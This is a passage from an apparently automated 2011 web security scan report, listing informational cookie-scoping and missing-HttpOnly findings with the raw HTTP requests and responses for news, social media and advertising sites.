Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:43:57 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.83. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_yx7Fmxxchmux7Cx7Ech=[CS]v4|0-0|4E62D373[CE]; Expires=Fri, 2 Sep 2016 01:25:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 HTTP/1.1
Host: usatoday1.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:25:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_yx7Fmxxchmux7Cx7Ech=[CS]v4|0-0|4E62D373[CE]; Expires=Fri, 2 Sep 2016 01:25:07 GMT; Domain=.2o7.net; Path=/
Location: http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:25:07 GMT
Last-Modified: Mon, 05 Sep 2011 01:25:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www618
Content-Length: 0
Content-Type: text/plain
Connection: close

13.84. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
BizoData=Pp1FHRK43ZwxEqHtFj4aisdQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQ6is7u1bQQY8aj5XcunNcMDa7Re6IGD4lOeTENrYq3ZvAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrisu7VtBBjxqPldy6c1wwH4DELwm2ipwNthjuRJX8ipa7TbwiiAhQOisLScEBcVisgQgNPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9up8HFkflmyEwieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:45:19 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZwxEqHtFj4aisdQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQ6is7u1bQQY8aj5XcunNcMDa7Re6IGD4lOeTENrYq3ZvAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrisu7VtBBjxqPldy6c1wwH4DELwm2ipwNthjuRJX8ipa7TbwiiAhQOisLScEBcVisgQgNPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9up8HFkflmyEwieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Content-Length: 0
Connection: keep-alive

13.85. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobPoster/Products/PostJobsInfo.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=dbe0a97eaa0d435580963487f7d94f26-368400317-wg-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:17 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.86. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CB%5FSID=724f92f936a743f6a3638215db1bfbe7-368400317-x3-6; domain=.careerbuilder.com; path=/; HttpOnly
BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:16 GMT; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.87. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 01:26:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 01:26:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.194.30
Connection: close
Date: Sun, 04 Sep 2011 01:26:01 GMT
Content-Length: 0

13.88. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.188.39
Connection: close
Date: Sun, 04 Sep 2011 01:26:00 GMT
Content-Length: 0

13.89. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.200.54
Connection: close
Date: Sun, 04 Sep 2011 01:25:59 GMT
Content-Length: 0

13.90. http://www.google.com/insights/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/insights/search/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=izeitgeist-ad-metrics=t0E3hsRy46s; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insights/search/ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=google+trend+top+search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 200 OK
Set-Cookie: I4SUserLocale=en_US; Expires=Mon, 03-Sep-2012 00:41:06 GMT; Path=/insights/search; HttpOnly
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 00:41:06 GMT
Expires: Sun, 04 Sep 2011 00:41:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 139384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="icon" type="image/gif" href="/insights/search/resou
...[SNIP]...

13.91. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.92. http://www.myspace.com/Modules/PostTo/Pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/Modules/PostTo/Pages/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sun, 11-Sep-2011 01:26:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: 9fd3a6d53bb05cb31e6d757d4c5a9f0864a042db68c9cdb0
Set-Cookie: MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sun, 11-Sep-2011 01:26:20 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Pimple Faced Geeks
Date: Sun, 04 Sep 2011 01:26:20 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

13.93. http://www.sacbee.com/reg_js/access_check.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg_js/access_check.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vmix_core_user_info=.null; domain=.sacbee.com; path=/vmix_hosted_apps; expires=Thu, 09-Sep-2010 01:27:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_js/access_check.js HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Wed, 21 Sep 2005 15:09:45 GMT
ETag: "108293-4b-433177b9"
Accept-Ranges: bytes
Content-Length: 75
Content-Type: application/x-javascript
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:14 GMT
Connection: close
Set-Cookie: vmix_core_user_info=.null; domain=.sacbee.com; path=/vmix_hosted_apps; expires=Thu, 09-Sep-2010 01:27:14 GMT

// $Id: access_denied.js 302 2005-09-21 15:09:45Z shilton $
verified=true;

13.94. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=adaptv HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:15:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://sync.adap.tv/sync?type=gif&key=adnetik&uid=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

13.95. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

14. Cookie without HttpOnly flag set previous next
There are 159 instances of this issue:

http://content.usatoday.com/quickquestion/jquery/1.0.1.html
http://findnsave.sacbee.com/api/aacoupons.json
http://findnsave.sacbee.com/api/groupon.json
http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826
http://shop.sprint.com/mysprint/shop/phone_wall.jsp
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://trc.taboolasyndication.com/reuters/trc/2/json
http://www.cars.com/go/crp/index.jsp
https://www.linkedin.com/secure/login
http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html
http://www.usatoday.com/community/profile.htm
http://www.usatoday.com/marketing/feedback.htm
http://www.usatoday.com/marketing/questions.htm
http://a.tribalfusion.com/j.ad
http://ad.360yield.com/match
http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3
http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5
http://ad.turn.com/r/cs
http://ad.turn.com/server/pixel.htm
http://ad.yabuka.com/statsin/adframe/803/300x250
http://ad.yieldmanager.com/pixel
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/ajs.php
http://ads.undertone.com/fc.php
http://ads.undertone.com/l
http://ak1.abmr.net/is/ads.undertone.com
http://ak1.abmr.net/is/tag.admeld.com
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json
http://ar.atwola.com/atd
http://as.casalemedia.com/s
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://bookmarks.yahoo.com/myresults/bookmarklet
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js
http://c7.zedo.com/utils/ecSet.js
http://c7.zedo.com/utils/ecSet.js
http://clk.fetchback.com/serve/fb/click
http://cm.npc-mcclatchy.overture.com/js_1_0/
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://companion.adap.tv/companion/post
http://control.adap.tv/control
http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F
http://developers.facebook.com/plugins/
http://i.w55c.net/ping_match.gif
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://legolas.nexac.com/lgalt
http://load.exelator.com/load/
http://log.adap.tv/log
http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516
http://odb.outbrain.com/utils/get
http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js
http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js
http://p.brilig.com/contact/bct
http://pix04.revsci.net/A11149/a4/0/0/123.302
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/F09828/a4/0/0/0.js
http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js
http://pix04.revsci.net/J06575/a4/0/0/pcx.js
http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js
http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/server/pixel.htm
http://rt.legolas-media.com/lgrt
http://segments.adap.tv/data
http://segments.adap.tv/data/
http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif
http://sitelife.usatoday.com/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js
http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js
http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif
http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js
http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif
http://sync.adap.tv/sync
http://sync.mathtag.com/sync/img
http://tacoda.at.atwola.com/rtx/r.js
http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee
http://tags.bluekai.com/site/2964
http://tags.bluekai.com/site/38
http://tags.bluekai.com/site/4449
http://tags.bluekai.com/site/450
http://tags.bluekai.com/site/4592
http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
http://tu.connect.wunderloop.net/TU/1/1/1/
http://tu.connect.wunderloop.net/TU2/1/1/1/
http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954
http://www.bizographics.com/collect/
http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx
http://www.cars.com/go/advice/index.jsp
http://www.cars.com/go/advice/shopping/cpo/index.jsp
http://www.cars.com/go/kbb/kbbInput.jsp
http://www.cars.com/go/photogalleries/index.jsp
http://www.cars.com/go/search/advanced_search.jsp
http://www.cars.com/images/bttncapOrngR.gif
http://www.cars.com/images/long_back_orng.gif
http://www.cars.com/includes/js/makemodels-used.js
